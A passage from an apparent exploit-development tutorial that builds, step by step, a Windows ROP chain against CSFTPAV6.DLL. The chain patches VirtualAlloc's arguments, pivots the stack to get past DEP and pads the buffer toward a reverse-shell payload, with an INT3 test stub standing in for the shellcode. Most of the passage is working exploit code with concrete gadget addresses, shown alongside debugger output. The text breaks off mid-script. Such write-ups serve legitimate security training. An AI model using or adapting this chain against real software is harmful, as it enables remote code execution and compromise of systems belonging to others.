After successfully determining the offset for the placeholder on the stack at runtime, the next step is to patch the dummy value with the VirtualAlloc function address that we previously obtained from the Import Address Table (0x5054A220).

Handling Bad Characters in VirtualAlloc Addresses

However, because the last byte of that address contains the value 0x20 (space), which is one of the bad characters in our scenario, we cannot load the address 0x5054A220 directly into the payload.

Therefore, to solve this problem, we will use a runtime address adjustment approach:

We increase the address by one to 0x5054A221 so it is free from bad characters.
After the address is loaded into a register, we add -1 (0xFFFFFFFF) to it using an arithmetic gadget to get back the original address 0x5054A220.
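The two steps above generalize to any address that contains a bad character: search for a small delta such that both the adjusted address and the negative delta are clean. The following is a minimal sketch of that idea; split_address is a hypothetical helper and the search limit is arbitrary.

```python
from struct import pack

BAD_CHARS = bytes([0x00, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x20])


def is_clean(value, bad=BAD_CHARS):
    """True when none of the four packed bytes is a bad character."""
    return not any(byte in bad for byte in pack("<L", value & 0xFFFFFFFF))


def split_address(target, max_delta=0x100):
    """Find (loaded, addend) with loaded + addend == target (mod 2**32), both clean."""
    for delta in range(1, max_delta):
        loaded = (target + delta) & 0xFFFFFFFF
        addend = (-delta) & 0xFFFFFFFF
        if is_clean(loaded) and is_clean(addend):
            return loaded, addend
    return None


loaded, addend = split_address(0x5054A220)
print(hex(loaded), hex(addend))
```

For the IAT entry used here, the first candidate already works, which matches the +1 / -1 pair chosen by hand.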

Here is the implementation of this runtime address adjustment inside the ROP chain that we will build.

Loading the Modified Address

The first step is to put the modified address (0x5054A221) into the EAX register.

CODE | 2

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) # VirtualAlloc IAT + 1

Adjusting and Restoring the Address

Next, we need the value -1 as the second operand. In 32-bit hexadecimal representation, -1 is written as 0xFFFFFFFF, and this value is loaded into the ECX register.

Once both values are in the registers, we add the value in EAX (0x5054A221) with the value in ECX (-1) using the add eax, ecx ; ret gadget to return EAX to the correct IAT address.

CODE | 2

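rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffff)) # -1 (two's complement)
## Add EAX and ECX (0x5054A221 + -1 = 0x5054A220)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret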

At this point, our EAX register holds the value 0x5054A220. However, remember that this is just the IAT entry address, not the actual VirtualAlloc function address.

Resolving the Function Pointer

Therefore, we need to take the actual VirtualAlloc address stored inside that IAT entry. To do this, we use the mov eax, dword ptr [eax] ; ret gadget to dereference it.

CODE | 1

rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret

Before this instruction executes, EAX contains the IAT entry address (0x5054A220).

After it executes, EAX contains the actual address of the VirtualAlloc function in memory (0x75AD38C0 in this run).

Patching the Stack Placeholder

The final step is to overwrite the placeholder (0x45454545) on the stack with the VirtualAlloc address stored in the EAX register.

To do this, we use the gadget mov dword [esi], eax ; ret, to write the EAX value to the address pointed to by ESI (the placeholder location).

CODE | 2

## Patch the placeholder with the real VirtualAlloc address
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

With this step completed, the placeholder is dynamically replaced with the correct VirtualAlloc address, and the ROP chain successfully resolves the function at runtime.

Here is the complete code snippet for the entire process that we just discussed:

CODE | 25

# Obtain & Patch VirtualAlloc Address

rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

## Load sanitized IAT address (+1 to avoid the bad character 0x20)
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) # IAT address + 1 (0x5054A220 + 1)

## Prepare -1 in ECX for Restore
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffff)) # -1 (Two's Complement)

## Restore Original Address (EAX + ECX)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Dereference to get actual function address
rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret

## Patch the placeholder with the real VirtualAlloc address
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Patching Return Address

The next step is to patch the return address on the stack so that execution jumps straight to our shellcode right after VirtualAlloc finishes its job. However, before we can overwrite it with the shellcode address, we must first make sure that ESI points to the correct stack location.

PNG

PNG |

Currently, ESI still points to the slot where we just wrote the VirtualAlloc address (from the previous stage). In a typical stack layout, the return address is placed immediately after the function address, which means it is located 4 bytes ahead of the current ESI position. Therefore, our goal is to increment ESI by 4 bytes so that it points precisely to the placeholder 0x46464646.

Aligning ESI to the Placeholder

Ideally, we would use a single efficient instruction such as add esi, 0x04 ; ret. Unfortunately, no such “clean” gadget is available inside CSFTPAV6.DLL.

As an alternative, we use the inc esi gadget (which increments ESI by 1) four times in a row, which gives the same final result: ESI moves forward 4 bytes.

CODE | 6

## Advance ESI by 4 bytes to reach the return address placeholder

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

The extra add al, 0x2B instruction inside the gadget is an unwanted side effect, but it is harmless here: it only changes the low byte of EAX, which is overwritten by the next gadget before it is used, and it does not touch ESI or the stack layout. It is therefore safe to use.
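The side effect of the repeated gadget can be modelled in a few lines. This is a sketch under stated assumptions: `advance_esi` and `simulate` are hypothetical helper names, and the starting register values are arbitrary examples. It shows that four runs move ESI by exactly 4 while only the low byte of EAX is disturbed.

```python
from struct import pack

INC_ESI = 0x50522fa7  # inc esi ; add al, 0x2B ; ret

def advance_esi(count=4):
    """Return `count` copies of the inc esi gadget as packed dwords."""
    return pack("<L", INC_ESI) * count

def simulate(esi, eax, count=4):
    """Model the register effects of running the gadget `count` times."""
    for _ in range(count):
        esi = (esi + 1) & 0xFFFFFFFF
        al = ((eax & 0xFF) + 0x2B) & 0xFF   # only the low byte of EAX changes
        eax = (eax & 0xFFFFFF00) | al
    return esi, eax

chunk = advance_esi()
esi, eax = simulate(0x1000, 0x75AD38C0)
print(len(chunk), hex(esi), hex(eax))
```

In the exploit script, `rop += advance_esi()` would be equivalent to the four identical lines above.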

PNG

PNG |

After these four lines are executed, the ESI pointer now points exactly to the placeholder 0x46464646 on the stack.

Calculating the Shellcode Address

The next step is to fill the return address placeholder (currently pointed to by ESI) with our shellcode address. The main problem is that we don’t know the absolute address of the shellcode in advance, because the stack address changes from run to run.

However, we know that the shellcode is located in the same stack, only several bytes (offset) away from our current position. Therefore, our approach is as follows:

Take the current stack position by copying the address in ESI into another register as the calculation base.
Add the offset to that register so that it points to the shellcode.
Write the result back to the location pointed to by ESI.

ROP Chain Implementation

First, we need a gadget that copies the value from ESI to another register. The following gadget works well for our plan:

CODE | 2

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi

Since this gadget copies the value into EAX, we’ll use EAX as our base for calculating the shellcode address.

PNG

PNG |

Once EAX contains the base address, we calculate the shellcode address, estimating that the shellcode is located 0x210 bytes away from this position. As before, to avoid null bytes, we load the negative value (-0x210) and subtract it. Mathematically, EAX - (-0x210) is the same as EAX + 0x210.

CODE | 3

rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret (restore ESI, clobbered by the pop esi above)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xFFFFFDF0)) # -0x210

Here, the pop ecx gadget loads the negative value -0x210 (0xFFFFFDF0 in 32-bit two's complement) into ECX, while push eax ; pop esi restores ESI, which the pop esi in the previous gadget overwrote with junk.
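The encoding of the negative offset and the effect of the subtraction can be reproduced with plain integer arithmetic. In this minimal sketch, `to_dword` and `sub32` are hypothetical helper names, and `base` is an illustrative stack address rather than a value taken from the debugger.

```python
MASK = 0xFFFFFFFF

def to_dword(value):
    """Encode a signed integer as a 32-bit two's complement value."""
    return value & MASK

def sub32(eax, ecx):
    """Model `sub eax, ecx` with 32-bit wraparound."""
    return (eax - ecx) & MASK

ecx = to_dword(-0x210)
print(hex(ecx))                 # 0xfffffdf0

base = 0x0D44E304               # illustrative address of the return address placeholder
print(hex(sub32(base, ecx)))    # same as base + 0x210
```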

PNG

PNG |

With the values ready in EAX and ECX, we simply subtract the ECX value from EAX using the sub eax, ecx gadget.

CODE | 1

rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret -> EAX = EAX - (-0x210) = EAX + 0x210

The final step is to overwrite the placeholder 0x46464646 on the stack with the shellcode address stored in EAX.

CODE | 1

rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

PNG

PNG |

With this final patch in place, once VirtualAlloc completes, execution will return to the address we calculated, and the program will jump straight into our shellcode. Here is the complete chain for this stage:

CODE | 9

# Patching Shellcode Return Address

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf0)) # -0x210
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Patching VirtualAlloc Argument

After the return address is patched, the next step is to fill in the four arguments (lpAddress, dwSize, flAllocationType, flProtect) required by VirtualAlloc, so that the memory region holding the shellcode becomes executable and DEP no longer blocks it.

Patching lpAddress

The first argument is lpAddress, which specifies the starting memory address we want to change permissions for. Since our main goal is to execute the shellcode, this argument must point to the shellcode location itself. The value will be the same as the shellcode address we used for the return address earlier.

Align ESI to lpAddress placeholder

In the previous step, the ESI register pointed to the return address position on the stack.

PNG

PNG |

Since lpAddress is located exactly 4 bytes after it, we simply shift ESI by +4 bytes using the INC ESI gadget four times again.

CODE | 6

## Align ESI to lpAddress placeholder (+4 bytes)

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

Calculate Shellcode Address Relatively

Keep in mind that we can’t write the shellcode address directly to the stack, because we don’t know it in advance. So, just like we did for the return address, we have to calculate it relatively using a fixed offset. The difference is that ESI has moved 4 bytes closer to the shellcode, so the previous offset -0x210 must be adjusted to -0x20C (-0x210 + 0x4 = -0x20C).

PNG

PNG |

This new offset is then used to calculate the correct shellcode address relative to the current register value. We can implement this adjustment with the following ROP chain:

CODE | 12

## Copy ESI to EAX

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # junk

## Load adjusted negative offset (-0x20C) to ECX
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf4)) # -0x20c

## Calculate final shellcode address (EAX = EAX - ECX)
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret

In the gadget chain above, the offset -0x20C compensates for the 4-byte shift of ESI, so the calculated shellcode address is the same one we used for the return address.
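A quick way to confirm that both offsets resolve to the same target is to model the subtraction for each placeholder. The sketch below assumes an illustrative address for the return address placeholder; `shellcode_target` is a hypothetical helper name.

```python
MASK = 0xFFFFFFFF

def shellcode_target(esi, distance):
    """Model `sub eax, ecx` where ECX holds the negated distance."""
    ecx = (-distance) & MASK
    return (esi - ecx) & MASK

ret_slot = 0x0D44E304     # illustrative address of the return address placeholder
lp_slot = ret_slot + 4    # the lpAddress placeholder sits one dword later

print(hex(shellcode_target(ret_slot, 0x210)))
print(hex(shellcode_target(lp_slot, 0x20C)))
```

Both lines print the same address, which is the property the adjusted offset is meant to preserve.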

PNG

PNG |

Patch lpAddress with Shellcode Address

At this point, the EAX register holds the shellcode address. The final step is to patch that value into the stack at the lpAddress parameter position. To do this, we use the following gadget:

CODE | 2

# Patch lpAddress with Shellcode Address (from EAX)
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

This gadget copies the value from EAX to the address pointed to by ESI. Since we previously directed ESI to the lpAddress placeholder, this instruction will replace the placeholder value 0x47474747 with the actual shellcode address.

To ensure the patching process runs correctly, we update the exploit, run it again in the debugger, and set a breakpoint at the relevant location.

PNG

PNG |

From the debugger result, we can see that the lpAddress placeholder was successfully patched to the shellcode address just as we wanted.

Patching dwSize

The second argument of VirtualAlloc is dwSize, the size of the region in bytes. Any value between 0x1 and 0x1000 works here, as long as our shellcode does not exceed 0x1000 bytes (the size of a standard memory page): VirtualAlloc works at page granularity, so even a size of 0x1 affects the whole page that contains lpAddress.

However, writing 0x00000001 directly to the stack is not possible because of the null bytes. To solve this, we reuse the two’s complement approach with a NEG operation: negating 0xFFFFFFFF (-1) leaves 1 in the lower 32 bits. In WinDbg, this is equivalent to:

CODE | 2

0:062> ? 0 - 0xffffffff
Evaluate expression: -4294967295 = ffffffff`00000001

Align ESI to dwSize placeholder

Before we handle the value, we need to make sure our write pointer (ESI) is in the right position. Since the dwSize argument is located exactly 4 bytes above the previous argument (lpAddress), we need to shift ESI up by 4 bytes using the same INC ESI gadget as in the previous step.

CODE | 5

## Align ESI to dwSize placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

Patching dwSize with Calculated Value

Now that ESI points to the dwSize location, it is time to prepare the value 1 in the EAX register without including null bytes. The strategy is to load the value -1 (0xFFFFFFFF) into EAX, then run the neg eax instruction to turn it into 1. Once the value is ready, we write it to the address pointed to by ESI.

Here is the ROP chain implementation for that logic:

CODE | 6

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret  
rop += pack("<L", (0xffffffff)) # -1 into EAX
rop += pack("<L", (0x50527840)) # neg eax ; ret →  EAX=0x1

## Patch dwSize placeholder with EAX
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret  → Write 0x1 to dwSize

In the debugger, once the neg eax instruction is executed, the EAX register will successfully change to 00000001.
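The NEG step is easy to reproduce outside the debugger. This is a minimal model of the instruction on a 32-bit register, with `neg32` as a hypothetical helper name.

```python
def neg32(value):
    """Model `neg eax`: two's complement negation truncated to 32 bits."""
    return (-value) & 0xFFFFFFFF

print(hex(neg32(0xFFFFFFFF)))   # 0x1
print(hex(neg32(0x1)))          # 0xffffffff
```

Because 0xFFFFFFFF contains no null bytes, it can be placed on the stack and converted to 1 at runtime.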

PNG

PNG |

The final gadget in the chain above copies that value to the stack location pointed to by ESI.

PNG

PNG |

To verify the result, we can check the stack condition after this ROP chain is executed using the command dds esi -c L5 in WinDbg. The check shows that at the dwSize offset, the value has changed to 00000001, which means the dwSize argument was successfully patched.

Patching flAllocationType

The third argument is flAllocationType. Its value must be set to 0x1000 (MEM_COMMIT), which instructs Windows to commit the memory pages so they can be used to store and execute the shellcode.

The Limitation of Negation Technique

Here, we face a slightly different situation compared to patching dwSize. We cannot reuse the NEG (two’s complement) approach, because the value we would have to load, the negation of 0x1000, itself contains a null byte.

CODE | 2

0:062> ? 0 - 1000
Evaluate expression: -4096 = fffff000

Therefore, to avoid null bytes, we pick two large, “clean” numbers (containing no null bytes) and add them together to reach the final result of 0x1000.

PNG

PNG |

Based on the calculation above, both numbers are free of null bytes. When summed, 0x80808080 + 0x7f7f8f80 = 0x100001000, which does not fit in a 32-bit register. The carry is discarded, so EAX keeps only the lower 32 bits: 0x00001000, exactly the value we need.
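The second addend does not have to be found by hand. The sketch below computes it for a chosen first value and rejects pairs that contain a bad character; `is_clean` and `complement_for` are hypothetical helper names, and `BAD_CHARS` is the bad-character list this article uses for msfvenom.

```python
from struct import pack

BAD_CHARS = b"\x00\x09\x0a\x0b\x0c\x0d\x20"
MASK = 0xFFFFFFFF

def is_clean(value):
    """True if the packed dword contains no bad characters."""
    return not any(b in BAD_CHARS for b in pack("<L", value))

def complement_for(target, first=0x80808080):
    """Return the second addend so that (first + second) mod 2**32 == target."""
    second = (target - first) & MASK
    if not (is_clean(first) and is_clean(second)):
        raise ValueError("addend contains a bad character; pick another first value")
    return second

print(hex(complement_for(0x1000)))   # 0x7f7f8f80
```

The same helper can be reused for any other small constant that cannot be written to the stack directly.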

Align ESI to flAllocationType Placeholder

Before we start calculating, we must shift the ESI pointer again to point to the third argument position on the stack. Since this position is 4 bytes away from the previous argument (dwSize), we use the INC ESI gadget four times again.

CODE | 5

## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7))
rop += pack("<L", (0x50522fa7))
rop += pack("<L", (0x50522fa7))

Calculate Value 0x1000 via Addition

Next, we implement the addition logic into our ROP chain. We use the EAX and ECX registers to hold the two “safe” values we picked, and then add them together.

CODE | 10

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (no null bytes)

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

# Perform calculation: EAX = EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

Patch flAllocationType with Calculated Value

The final step for this argument is to move the calculated value from EAX into the stack, specifically at the location pointed to by ESI.

CODE | 2

# Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

The mov dword ptr [esi], eax instruction overwrites the flAllocationType placeholder on the stack with the value 0x1000. Below is the full ROP chain for patching flAllocationType:

CODE | 22

# Patching flAllocationType

## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", 0x50522fa7) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (No null bytes)

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

## Perform calculation 
## Add EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Run our updated skeleton script. In the debugger, when the add eax, ecx instruction is executed, the EAX register successfully changes to 00001000.

PNG

PNG |

By inspecting the memory using the dds esi -c L5 command, we can see that the offset for flAllocationType has changed from 00000000 to 00001000. This indicates that the flAllocationType argument has been successfully patched with the MEM_COMMIT value. In the next stage, we only need to handle one last argument.

Patching flProtect

The fourth and final argument of VirtualAlloc is flProtect. This argument is crucial because it sets the memory access permissions we want. We must set it to 0x40, which is the constant for PAGE_EXECUTE_READWRITE. This permission tells Windows that the memory area containing the shellcode can be read, written to, and most importantly executed.

PNG

PNG |

Just like before, we can’t send 0x00000040 directly to the stack because it contains null bytes. Therefore, we apply the arithmetic addition (ADD) strategy again with two large “clean” numbers.

Align ESI to flProtect Placeholder

Currently, ESI points to flAllocationType, so we need to shift it up 4 more bytes to reach the flProtect placeholder.

CODE | 5

# Align ESI +4 to point to flProtect placeholder
rop += pack("<L", 0x50522fa7) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)

Calculate Value 0x40 via Addition

Once the pointer is ready, we load the two “safe” values into the registers and sum them using a similar gadget, adjusting the complement value so the final result becomes 0x40.

CODE | 10

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Add EAX + ECX -> Result = 0x40
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

PNG

PNG |

Patch flProtect with Calculated Value

After the ADD instruction is executed, the EAX register now holds a clean 0x40 value. We just need to move the calculation result from EAX into the stack at the location pointed to by ESI.

CODE | 2

## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

This instruction will overwrite the flProtect placeholder in the stack with the value 0x00000040. With this, all VirtualAlloc arguments are complete and ready to go.

Summary of Patched Arguments

Based on the WinDbg check, all arguments are now correctly filled:

lpAddress: Shellcode address
dwSize: 0x1 (rounded up to one memory page)
flAllocationType: 0x1000 (MEM_COMMIT)
flProtect: 0x40 (PAGE_EXECUTE_READWRITE)

With these four arguments in place, VirtualAlloc will change the protection of the memory page where the shellcode is located, making it executable. After that, execution is handed over to the shellcode to finish the exploitation process.
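For reference, the patched frame can be written out as the six dwords it ends up containing. This is only an illustration of the final layout: `virtualalloc_frame` is a hypothetical helper, and the two addresses are example values taken from the debugger output in this article, which will differ on another run. Note that the packed result contains null bytes, which is exactly why the chain builds it at runtime instead of sending it directly.

```python
from struct import pack

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

def virtualalloc_frame(func_addr, shellcode_addr):
    """Pack the six dwords in the order they sit on the stack after patching."""
    return b"".join(pack("<L", v) for v in (
        func_addr,               # VirtualAlloc address (was 0x45454545)
        shellcode_addr,          # return address       (was 0x46464646)
        shellcode_addr,          # lpAddress            (was 0x47474747)
        0x1,                     # dwSize               (was 0x48484848)
        MEM_COMMIT,              # flAllocationType     (was 0x49494949)
        PAGE_EXECUTE_READWRITE,  # flProtect            (was 0x51515151)
    ))

frame = virtualalloc_frame(0x75AD38C0, 0x0D44E514)
print(frame.hex())
print(b"\x00" in frame)   # True: this frame could not be sent as-is
```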

Here is the full ROP chain for patching flProtect:

CODE | 22

## Align ESI to point to flProtect placeholder
## Move ESI 4 bytes up from the previous argument (flAllocationType)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Calculation & Patching
## Add EAX + ECX -> Result = 0x40
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret


## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Return to VirtualAlloc

After dynamically patching the four VirtualAlloc arguments into the stack, our final task is to perform a stack pivot. However, before we change the ESP value to point to our controlled area, we must align the pointer so that ESP lands exactly at the start of the VirtualAlloc structure we have set up.

Calculate the Offset to VirtualAlloc

Similar to previous steps, we need to determine how far to shift our reference pointer. Currently, the closest reference we have is the ESI register.

By checking memory using the offset from ESI, it appears the VirtualAlloc structure is located 20 bytes above the current ESI position (mathematically, the offset is -0x14).

PNG

PNG |

However, we will not use this offset directly. The gadget we will use for the stack pivot later contains a pop ebp instruction, and when it runs it moves the stack pointer (ESP) up by 4 bytes. Therefore, we must compensate by adding 4 bytes to our base offset, making the total 24 bytes. So, the final offset value we will use is -24 (or 0xffffffe8 in hexadecimal).

Since we need to do some arithmetic again to apply this offset, we must copy the pointer value stored in ESI back into EAX. At this stage, we can reuse the gadget we used earlier to do this.

CODE | 10

# Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

# Load negative offset into ECX 
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)

# Calculate target address (EAX + ECX)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

If we look at the result of the code above in the debugger, after add eax, ecx is executed, EAX holds the address 0x0d49e2fc. This address points to the junk dword (41414141) located directly above VirtualAllocStub.

PNG

PNG |

This proves our calculation is correct. The pop ebp instruction later, which we will use during the stack pivot, will throw away that junk value, and ESP will land right on target.

Executing the Stack Pivot

Once the offset calculation is complete, the compensated destination address is in the EAX register. The next step is to move that address into ESP, which is the moment the actual stack pivot happens.

After searching the available gadgets, we found a sequence that uses EBP as an intermediary: it first swaps EAX into EBP and then copies EBP to ESP. This is where the offset compensation we calculated earlier pays off.

CODE | 5

## Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

When the mov esp, ebp instruction executes, ESP points to the address 0x0d49e2fc (the location of the junk value). The pop ebp instruction that follows then removes that junk value from the stack and increments ESP by 4 bytes, shifting it from 0d49e2fc to 0d49e300.

The image below shows how the EBP and ESP registers change step by step as the gadgets execute.

PNG

PNG |

This shift corrects the ESP position from -24 to -20, so the pointer lands precisely at the start address of the VirtualAlloc structure just before the RET instruction is executed.
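The pivot arithmetic can be traced with a small model of the final gadgets. This is a sketch under stated assumptions: `pivot` is a hypothetical helper, and the starting ESI value is derived by adding 24 to the 0x0d49e2fc address shown in the debugger, so it only applies to that particular run.

```python
MASK = 0xFFFFFFFF

def pivot(esi):
    """Model the final gadgets: compute ESI - 24, move it into ESP, then pop ebp."""
    eax = (esi + 0xFFFFFFE8) & MASK   # add eax, ecx  (ECX = -24)
    ebp = eax                         # xchg eax, ebp
    esp = ebp                         # mov esp, ebp
    esp = (esp + 4) & MASK            # pop ebp consumes the junk dword
    return eax, esp                   # ret then pops the VirtualAlloc address at ESP

flprotect_slot = 0x0D49E314           # derived: 0x0d49e2fc + 24 (ESI points at flProtect)
eax, esp = pivot(flprotect_slot)
print(hex(eax), hex(esp))
```

The second value is 20 bytes below the flProtect slot, which is where the patched VirtualAlloc address sits.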

Verifying Memory Protection

Before proceeding, we need to verify if VirtualAlloc actually worked. The best way is to check the memory protection status at the shellcode address before and after the API call.

Observe the debugger output below when the execution is at the VirtualAllocStub (before the function runs):

PNG

PNG |

Before execution, the shellcode address (0x0d44e514) still has the PAGE_READWRITE (0x04) status. This means the memory is currently only readable and writable, but not executable. If we force the shellcode to run now, the program will crash due to DEP (Data Execution Prevention).

After we let VirtualAlloc finish executing, we check the status again at the same address:

PNG

PNG |

As shown in the image above, the protection status has changed to PAGE_EXECUTE_READWRITE (0x40). This confirms we successfully bypassed the DEP protection mechanism to run our shellcode later.

Getting a Reverse Shell

Once VirtualAlloc finishes and the memory protection has changed to RWX, the function returns to the return address we patched onto the stack, which is the same shellcode address we passed as lpAddress. However, we cannot simply place the shellcode right after the ROP chain: the address we calculated must line up with the first byte of the shellcode. If we don’t leave the right amount of space, execution will fall into junk instructions and cause a crash.

Therefore, we need to calculate the offset and insert some padding bytes after the ROP chain and before the shellcode. To find the number of padding bytes needed, we let the debugger run until the VirtualAlloc function finishes returning.

PNG

PNG |

After that, we calculate the difference between the return address (0d44e514) and the end position of the ROP chain on the stack (0d44e434).

CODE | 2

0:062> ? 0d44e514 - 0d44e434
Evaluate expression: 224 = 000000e0

This calculation shows that we need exactly 224 bytes (0xE0) of padding. We can now update our Proof of Concept (PoC) by adding this padding before the shellcode.

CODE | 23

# Executing VirtualAlloc
## Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

# Padding to bridge ROP chain and shellcode
padding = b"C" * 0xe0

# Initial test with INT3 (0xCC)
shellcode = b"\xcc" * (0x400 - 276 - 4 - len(rop) - len(padding))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode,0,0,0,0)
buf += formatString
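As a cross-check, the 0xE0 padding and the 0x210 offset used earlier should describe the same buffer layout. The sketch below recomputes the distance from the placeholders to the shellcode using positions relative to the start of the %s argument. It rests on one assumption that should be re-verified whenever the chain changes: `ROP_DWORDS = 70` is a count of the pack() lines that build `rop` in the full exploit listing.

```python
OFFSET_TO_EIP = 276      # bytes before the saved return address
VA_FRAME = 6 * 4         # six placeholder dwords at the end of that filler
ROP_DWORDS = 70          # assumption: counted from the full exploit listing
PADDING = 0xE0

va_start = OFFSET_TO_EIP - VA_FRAME
ret_slot = va_start + 4                  # 0x46464646 placeholder
rop_start = OFFSET_TO_EIP + 4            # chain begins right after the EIP dword
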